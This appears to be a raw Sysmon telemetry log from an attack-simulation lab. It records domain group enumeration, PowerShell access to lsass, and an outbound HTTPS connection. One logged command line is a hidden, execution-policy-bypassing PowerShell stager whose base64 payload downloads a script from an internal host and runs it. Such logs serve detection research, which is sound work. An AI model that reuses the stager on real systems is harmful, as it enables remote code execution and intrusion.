22:02:42.553{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-8482-613A-0097-03000000C801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.553{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-8482-613A-0097-03000000C801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.521{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-8482-613A-0097-03000000C801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.521{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-8482-613A-0097-03000000C801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000035129454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-09 22:02:42.501{B81B27B7-8482-613A-0097-03000000C801}1740\PSHost.132756985624274612.1740.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000035129453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.484{B81B27B7-8482-613A-0097-03000000C801}1740ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_lumvackc.arv.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.484{B81B27B7-8482-613A-0097-03000000C801}1740ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_hg1mpefy.rn2.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000035129451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.468{B81B27B7-8482-613A-0097-03000000C801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_hg1mpefy.rn2.ps12021-09-09 22:02:42.468 10341000x800000000000000035129450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.453{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-8482-613A-0097-03000000C801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.422{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8482-613A-0097-03000000C801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.422{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.422{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.422{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.422{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.422{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-8482-613A-0097-03000000C801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.422{B81B27B7-8482-613A-FF96-03000000C801}55927088C:\Windows\system32\cmd.exe{B81B27B7-8482-613A-0097-03000000C801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.427{B81B27B7-8482-613A-0097-03000000C801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe Get-DomainGroupC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-8482-613A-FF96-03000000C801}5592C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe Get-DomainGroup 10341000x800000000000000035129441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.422{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8482-613A-FF96-03000000C801}5592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.406{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.406{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.406{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.406{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.406{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-8482-613A-FF96-03000000C801}5592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.406{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-8482-613A-FF96-03000000C801}5592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035129434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.420{B81B27B7-8482-613A-FF96-03000000C801}5592C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe Get-DomainGroupC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 354300x800000000000000035129464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:08.585{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62276-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:43.607{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8386EFBCBAFE70E74C40F020645C5DC,SHA256=D2ABCBD2A800E21972B6350DA3D684B974E30A7E276842DACACAA1D0410AB91B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:43.541{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2441904BDCDAB75FEEB2DC6961CCABE5,SHA256=47BF19F691C98FBF9D43D6C9FCD72196383BEE37CD145489FFB9FE0625738457,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:44.625{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10A897E87638C903999CBC0ED49ECE01,SHA256=559B91C1E6099F40AB278DF5A1714C67469067FF06CD0347804FBDCC3CEB4513,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:45.640{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB4C7AD9C67F7E1AEE209AC1FAEDF0FA,SHA256=5DE651D10A3E15A217B37ADB4FC154249596F1F8FEBD8C2F1F75D0F5664AFFDF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 